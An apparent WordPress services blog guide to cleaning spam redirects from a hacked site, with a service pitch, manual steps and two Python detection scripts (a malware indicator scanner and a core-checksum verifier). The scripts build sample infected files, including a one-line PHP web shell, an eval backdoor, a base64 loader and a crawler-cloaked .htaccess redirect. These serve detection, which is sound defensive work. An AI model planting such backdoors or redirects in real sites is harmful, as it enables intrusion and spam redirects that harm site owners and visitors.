Consider this scenario: When attempting to access your WordPress site, you’re unexpectedly redirected to a questionable gambling platform or a dubious online pharmacy.
The realization that your website has been compromised can be alarming. 😱
We understand the fear and annoyance this situation brings. However, the first step is to remain calm.
Your website is salvageable, and we’re prepared to assist you at each stage of restoration. Whether your audience encounters spam redirects or you’re confronted with the unsettling “This site may be hacked” alert from Google, we can help.
This guide outlines two reliable methods for preventing WordPress from redirecting to spam sites.
Why Is My WordPress Site Redirecting to Spam?
Spam redirects occur when hackers insert harmful code into your WordPress installation. This code reroutes visitors to undesirable websites containing advertisements, phishing attempts, or malware.
Attackers employ various techniques to infiltrate your site, such as:
- Infected Plugins & Themes: Plugins and themes acquired from unofficial sources, often called ‘nulled,’ frequently introduce malware and spam redirects.
- Weak Passwords: Attackers can guess or steal weak admin passwords to take control of your site and insert malicious code that redirects users to spam sites.
- Unpatched Security Holes: Outdated WordPress core files, plugins, or themes expose your site to known vulnerabilities that hackers exploit to introduce malicious code.
- Hidden Backdoors: Even after malware removal, hackers may leave concealed backdoors (a stray PHP file, a rogue admin account, a scheduled task) so they can reinfect the site later.
Often, website owners are unaware of a hack until visitors complain or search engines flag the site. Prompt action minimizes damage.
This guide presents two methods. Use the links below to jump to your preferred method:
- Method 1: Use A Hacked Site Repair Service (Recommended 🎯)
- Method 2: Fix WordPress Spam Site Redirects Manually (DIY Users)
- Step 4: Remove Malicious Code from Theme & Plugin Files
- Bonus Tips: Prevent Future WordPress Hacks
Let’s begin with our recommended solution because it is easier for beginners, non-tech users, and small business owners.
Method 1: Use A Hacked Site Repair Service (Recommended 🎯)
When your site is compromised, time is crucial. Each minute of spam redirects can lead to lost visitors, damaged reputation, and potential penalties from Google.
Therefore, many site owners opt for a professional repair service as the quickest and safest recovery method.
The Expert Solution:
For most WordPress users, the easiest way to clean spam redirects is by using our professional Hacked Site Repair Service.
For a single payment, our WordPress security experts will clean your site and eliminate the spam redirect code.
Our Hacked Site Repair Service provides these advantages:
- Expert technicians who have handled thousands of hacked sites
- Emergency response & timely fixes
- Complete malware removal and security hardening
- Post-cleanup backup of your website
- No risk of accidentally damaging your site
The best part is that you get a 30-day guarantee and a full refund if we are unable to fix your WordPress website.
👉 Ready for expert help? Just visit our Hacked Site Repair Service page to get started.
Method 2: Fix WordPress Spam Site Redirects Manually (DIY Users)
If you’re comfortable with WordPress and prefer to handle things yourself, then we’ve created a comprehensive step-by-step guide.
We’ll walk you through each part of the cleanup process, explaining what to do and why it matters.
⚠️ Caution: While DIY fixes are possible, they can be risky if you’re not familiar with WordPress security. One wrong move could make the problem worse or lead to data loss.
ℹ️ Important: Create a Backup Restore Point
Before starting any repairs, make sure you have a recent backup of your site. If something goes wrong, then you’ll want a restoration point.
We recommend using Duplicator, which easily backs up and restores your website. We use it across our business, and it has been a game-changer for our secure backup needs. For more details, check out our complete Duplicator review.
Note: A free version of Duplicator is also available. You can give it a try, but we recommend upgrading to a paid plan, which offers more features.
Now that your website is ready, you can begin removing the spam redirects.
Step 1: Scan Your Website for Malware
Scanning for malware is similar to using a metal detector to locate hidden threats within your site files.
Based on our experience, spam redirects are often concealed in unusual locations, emphasizing the need for a complete scan.
Luckily, there are excellent WordPress security plugins available that you can use to scan your website.
The following steps will help you run a successful malware scan.
First, install a reliable security plugin like Sucuri Security or Wordfence. This article uses Wordfence for demonstration, but the instructions are similar across plugins. For details, see our guide on how to install a WordPress plugin.
Then, go to the Scan area in the plugin menu and start a full site scan. The scan duration depends on the amount of data and files on your site.
The scan results will be displayed when it is finished.
Review the results carefully and look for severe, critical, and other issues. You can click on an issue to view its details.
Most security plugins include instructions for resolving each issue.
WordPress security scanners are good at finding common malware and known redirect signatures, so there is a fair chance they will find the spam redirect code. A clean scan is not proof that the site is clean, though: a fresh injection or a hand-written backdoor can slip past signature-based tools, which is why the manual steps below still matter.
💡 Pro tip: Don’t rely on just one scanner. Different security tools can catch different types of malware. We recommend using at least two different scanning solutions.
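A scanner plugin is a black box. The following Python script, an added example written for this guide and not code from Wordfence, Sucuri or any other plugin, shows the kind of checks such a tool runs, so that a "critical" finding means something to you and so that you can spot-check a copy of your site yourself. It flags obfuscated PHP (eval of a decoded payload, long base64 blobs, shell commands fed from request input), PHP files under wp-content/uploads where none belong, and .htaccess rules that send visitors, or only search-engine crawlers, to another host. The indicator patterns are this example's own, and the site it scans is constructed in a temporary directory.

```python
"""Indicator scan for spam-redirect malware in a WordPress tree.

Added example for this guide (not Wordfence, Sucuri or any plugin's code).
The patterns are this example's own; the scanned site is constructed below.
"""
import re
import tempfile
from pathlib import Path

# (label, regex) pairs that mark obfuscated or injected PHP/JS.
PHP_INDICATORS = [
    ("eval-of-decoded-payload",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)", re.I)),
    ("long-base64-blob",
     re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
    ("shell-exec-of-request-input",
     re.compile(r"\b(system|shell_exec|passthru|exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
    ("php-header-redirect",
     re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I)),
    ("js-location-redirect",
     re.compile(r"(window\.|document\.)?location(\.href)?\s*=\s*['\"]https?://", re.I)),
]
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".php7"}

# .htaccess directives that push visitors to another host, and the conditions
# redirect malware uses to show the spam only to crawlers or referred visitors.
HTACCESS_REDIRECT = re.compile(r"^\s*(RewriteRule|Redirect(Match|Permanent)?)\s+.*https?://", re.I | re.M)
HTACCESS_CONDITION = re.compile(r"RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}", re.I)


def scan_wordpress(root):
    """Return sorted (relative_path, label) findings for every file under root."""
    root = Path(root)
    findings = set()
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        if path.suffix.lower() in PHP_SUFFIXES:
            # PHP under uploads/ is never legitimate; droppers hide there as fake images.
            if rel.startswith("wp-content/uploads/"):
                findings.add((rel, "php-in-uploads"))
            for label, pattern in PHP_INDICATORS:
                if pattern.search(text):
                    findings.add((rel, label))
        elif path.name == ".htaccess":
            if HTACCESS_REDIRECT.search(text):
                findings.add((rel, "htaccess-external-redirect"))
            if HTACCESS_CONDITION.search(text):
                findings.add((rel, "htaccess-conditional-on-ua-or-referer"))
    return sorted(findings)


def build_sample_site(base):
    """Constructed sample install: two clean files, three infected ones."""
    files = {
        "wp-content/themes/twentytwentyfour/functions.php":
            "<?php\nadd_action('init', 'theme_setup');\n",
        "wp-content/plugins/contact-form/form.php":
            "<?php\nfunction cf_render() { echo 'form'; }\n",
        # Injected loader: eval of a base64 payload appended to a theme file.
        "wp-content/themes/twentytwentyfour/header.php":
            "<?php\n/* theme header */\neval(base64_decode('" + "QUJD" * 60 + "'));\n",
        # Web shell disguised as an image inside uploads.
        "wp-content/uploads/2024/03/image.jpg.php":
            "<?php if (isset($_GET['c'])) { system($_GET['c']); }\n",
        # Cloaked redirect: only search-engine crawlers get sent to the spam host.
        ".htaccess":
            "RewriteEngine On\n"
            "RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]\n"
            "RewriteRule ^(.*)$ https://pharma.example/$1 [R=302,L]\n",
    }
    for rel, content in files.items():
        p = Path(base) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)


def demo():
    """Scan the constructed site and return its findings."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_site(d)
        return scan_wordpress(d)


if __name__ == "__main__":
    for rel, label in demo():
        print(f"{label:40} {rel}")
```

Every hit is a lead, not a verdict: a theme that legitimately embeds a base64-encoded image or sets location.href will trigger a pattern, so read each flagged file before deleting it. To use it on your own site, download a copy of the document root and point scan_wordpress() at it.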
Step 2: Check for Suspicious Admin Users
Hackers often create hidden administrator accounts to maintain access to your site. These accounts might have innocent-looking usernames or be disguised as system accounts.
We’ve seen cases where hackers created a single cleverly disguised admin user account. We have also seen cases where the malware created dozens of admin accounts.
Just follow these steps to identify and remove suspicious users.
Go to the Users » All Users page in your WordPress admin dashboard.
Here, you need to look for accounts you don’t recognize. These could be accounts with random numbers or strange usernames or accounts pretending to be system accounts.
Next, remove each suspicious account right away by hovering over it and clicking ‘Delete’. WordPress will ask what to do with that account's content; attribute it to a user you trust rather than deleting it, or any posts the attacker created or edited under that account disappear with it.
⚠️ Warning: Some hackers give their accounts names that sound like system or support accounts, such as “admin_support” or “wp_maintenance”. WordPress itself never creates accounts like these, so be extra vigilant with system-looking usernames.
Once you have reviewed and deleted suspicious user accounts, you can move on to the next step.
Step 3: Replace Hacked WordPress Files
Just like replacing a virus-infected hard drive with a clean one, we need to restore clean versions of core WordPress files.
Don’t worry – this won’t affect any of your website content, images, themes, or plugins.
Here’s our tested process for safe file replacement.
First, you need to download a fresh copy of WordPress from WordPress.org and unzip the file on your computer.
Next, connect to your site using an FTP client or the File Manager app in cPanel and navigate to the WordPress root folder. Use SFTP or FTPS rather than plain FTP if your host offers it, because plain FTP sends your password across the network unencrypted.
This is the folder where you will be able to see the wp-admin, wp-includes, and wp-content folders.
Now, go ahead and delete the existing wp-admin and wp-includes folders.
Once they are deleted, you need to upload the clean versions from your computer.
After replacing the main folders, you need to replace all core files in the root directory. This includes files like wp-activate.php, wp-blog-header.php, wp-comments-post.php, wp-config-sample.php, and more.
When prompted, select ‘Overwrite’ to replace old files with the new version.
Next, download the wp-config.php file to your computer as a backup. Then open the .htaccess file in your root folder and read through it before deleting it: redirect malware often lives here as RewriteRule or Redirect lines pointing at another domain, sometimes wrapped in a RewriteCond that only matches search-engine crawlers, and seeing them tells you what the attacker did. Once you have deleted the file, WordPress writes a fresh .htaccess when you visit Settings » Permalinks and click ‘Save Changes’. Any custom rules you added yourself, for example for a caching plugin, have to be added again.
Now, you have to rename the wp-config-sample.php file to wp-config.php and then right-click to ‘Edit’ it. The file will open in a text editor like Notepad or TextEdit.
Carefully fill in the values for the database connection. Use the wp-config.php file you downloaded earlier to look up your WordPress database name, table prefix, username, password, and hostname, and copy only those values into the new file. Don't put the old file back as a whole, since a hacked wp-config.php may itself carry injected code.
Refer to our guide on editing the wp-config.php file for comprehensive instructions.
After replacing the core files, check both your website and admin dashboard to confirm proper functionality.
With the core files restored, proceed to the next step.
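Uploading fresh copies is the fix; verifying is the check. WordPress.org publishes MD5 checksums for every core file of every release (https://api.wordpress.org/core/checksums/1.0/?version=<version>&locale=en_US), and WP-CLI's `wp core verify-checksums` compares an install against them. The Python below, an added example for this guide and not WP-CLI's code, does the same comparison and additionally lists files inside wp-admin/ and wp-includes/ that the manifest does not know about, which is where planted backdoors tend to sit. The manifest and the install it checks are constructed so that it runs offline; on a real site, fetch the manifest for your exact version and pass its "checksums" dictionary.

```python
"""Verify WordPress core files against a manifest of known-good MD5 checksums.

Added example for this guide, not WP-CLI's code. WordPress.org serves the real
manifest per version; the one used here and the install it checks are constructed.
"""
import hashlib
import tempfile
from pathlib import Path

CORE_DIRS = ("wp-admin", "wp-includes")


def md5_file(path):
    """Hex MD5 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_core(root, checksums):
    """Compare the install at root with a {relative_path: md5} manifest.

    Returns 'modified' (hash differs), 'missing' (in manifest, not on disk) and
    'unexpected' (on disk inside wp-admin/ or wp-includes/, not in the manifest).
    A fresh upload never explains an unexpected file, so inspect those first.
    """
    root = Path(root)
    modified, missing, unexpected = [], [], []
    for rel, expected in checksums.items():
        p = root / rel
        if not p.is_file():
            missing.append(rel)
        elif md5_file(p) != expected:
            modified.append(rel)
    for sub in CORE_DIRS:
        if not (root / sub).is_dir():
            continue
        for p in (root / sub).rglob("*"):
            rel = p.relative_to(root).as_posix()
            if p.is_file() and rel not in checksums:
                unexpected.append(rel)
    return {"modified": sorted(modified), "missing": sorted(missing),
            "unexpected": sorted(unexpected)}


def build_sample(base):
    """Constructed install: one intact file, one tampered, one missing, one planted.

    Returns the manifest a clean copy of these files would have.
    """
    clean = {
        "wp-includes/version.php": b"<?php\n$wp_version = '6.5';\n",
        "wp-admin/admin.php": b"<?php\nrequire_once __DIR__ . '/../wp-load.php';\n",
        "wp-login.php": b"<?php\nrequire __DIR__ . '/wp-load.php';\n",
    }
    checksums = {rel: hashlib.md5(body).hexdigest() for rel, body in clean.items()}
    on_disk = dict(clean)
    on_disk["wp-includes/version.php"] += b"eval(base64_decode('QUJD'));\n"  # tampered
    del on_disk["wp-login.php"]                                              # missing
    on_disk["wp-includes/wp-cache-helper.php"] = b"<?php @eval($_POST['x']);\n"  # planted
    for rel, body in on_disk.items():
        p = Path(base) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)
    return checksums


def demo():
    """Build the constructed install in a temp dir and verify it."""
    with tempfile.TemporaryDirectory() as d:
        return verify_core(d, build_sample(d))


if __name__ == "__main__":
    for kind, paths in demo().items():
        for rel in paths:
            print(f"{kind:10} {rel}")
```

A file reported as modified right after you uploaded a clean copy means either that the upload failed or that something is re-infecting the site, usually a backdoor elsewhere. An unexpected file inside the core directories should be read before it is deleted, because it is evidence of how the attacker got in. The same idea applies to plugins from WordPress.org, where `wp plugin verify-checksums --all` compares each plugin against its published hashes.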
Step 4: Remove Malicious Code from Theme & Plugin Files
A frequent malware vector is through ‘nulled’ plugins and themes – essentially, pirated versions of premium WordPress resources obtained from unverified sources.
Hackers commonly insert malicious code into theme and plugin files, often embedding spam links and redirects within legitimate code to make detection more difficult. We’ll show you what to look for.
⚠️ Warning: Most WordPress theme and plugin settings are stored in the database and survive deleting the files. However, any custom changes you made directly to theme or plugin files are lost, and you will need to redo them (ideally in a child theme, so they survive future updates too).
Just follow this process to clean your plugin and theme files.
Begin by downloading new copies of all your themes and plugins from reliable sources. For free resources, the WordPress.org repository is the definitive source. Download premium themes and plugins from their official websites.
After downloading all plugin and theme files, use an FTP client to access your site and open the wp-content folder.
Next, remove the themes and plugins directories from your server. After deleting them, create new directories named ‘themes’ and ‘plugins’, resulting in empty themes and plugins folders on your website.
Now, begin uploading the theme and plugin files you previously downloaded. Remember to unzip each file before uploading it to your site.
After uploading, access your WordPress admin panel in a web browser and activate your theme and plugins. If any errors appear, re-upload the specific theme or plugin file.
Replacing the existing theme and plugin files with freshly downloaded copies from trusted sources removes any malicious code that was hidden in those files.
At this point, your website should be free of spam redirects. Before you declare it clean, check the places the steps above do not touch, because redirect code also hides there: wp-content/uploads (which should contain no PHP files at all), wp-content/mu-plugins, and the database, for example the siteurl and home rows in wp_options or script tags inserted into posts and widgets. Then enhance your website’s security to ensure continued protection.
Step 5: Securing WordPress After Cleaning Up Spam Redirects
Security is a continuous process, not a one-time task.
Now that the spam redirects are fixed and removed, the next step involves ensuring your website remains secure in the future.
This requires implementing additional security measures to harden your website.
1. Change All Website Passwords
Strong passwords are vital for WordPress security. If a hack is suspected, immediately change all passwords associated with your website.
This involves updating passwords for:
- All user accounts on your WordPress website. See our guide on changing passwords for all users in WordPress.
- All FTP account passwords. You can find and manage these within your hosting control panel.
- The password for your WordPress database user. MySQL users are typically found in the Database section of your hosting control panel. You also need to update the DB_PASSWORD value in your wp-config.php file; otherwise, you will see the ‘Error establishing a database connection’ message.
- The authentication keys and salts in wp-config.php. Generate a new set from https://api.wordpress.org/secret-key/1.1/salt/ and paste it over the old one. This invalidates every existing login cookie at once, including any the attacker still holds.
💡Pro Tip: Employ strong, unique passwords and consider a password manager such as 1Password for secure storage.
2. Install a Security Plugin and a WordPress Firewall
With the cleanup done, it’s time to improve your site’s defenses against future attacks. Consider this step as implementing a sophisticated security system for your WordPress installation.
Our recommended security configuration is as follows:
- Install a WordPress security plugin like Sucuri or Wordfence (both have excellent free versions).
- Implement a cloud-based WordPress firewall. We suggest using the free Cloudflare CDN, which proactively blocks suspicious activity before it impacts your site.
We use Cloudflare on CanadaCreate. You can read about our experience in our case study on switching to Cloudflare.
For robust WordPress security, use both a WordPress security plugin and a cloud-based firewall. Together they stop much of the malware, DDoS, and brute-force traffic before it reaches your site, though neither replaces keeping WordPress, themes, and plugins patched.
Bonus Tips: Prevent Future WordPress Hacks
Preventing hacks is better than fixing them. We’ve created a reliable prevention strategy based on assisting numerous users with site recovery.
Our WordPress security handbook contains a complete, step-by-step security setup suitable for beginners and small businesses; it’s the same setup we employ on all our sites.
Here are our key security recommendations:
- Set up automated WordPress backups.
- Maintain updated versions of WordPress core, themes, and plugins.
- Set up two-factor authentication in WordPress.
- Limit login attempts to prevent brute force attacks.
These easily implemented tips provide ongoing protection against malicious spam URL redirects.
Final Words: Securing WordPress From Spam Redirects and Malware
Spam redirects are alarming, but you now possess the tools and knowledge to repair your site.
Regardless of whether you select our Hacked Site Repair service (Recommended) or utilize this DIY guide, you’re taking positive action toward securing your WordPress website.
Remember, security is continuous, not a one-time task. The prevention tips shared will enhance your protection against future attacks. 💪
Consider reviewing our guide on identifying legitimate WordPress security emails or securing WordPress multisite installations.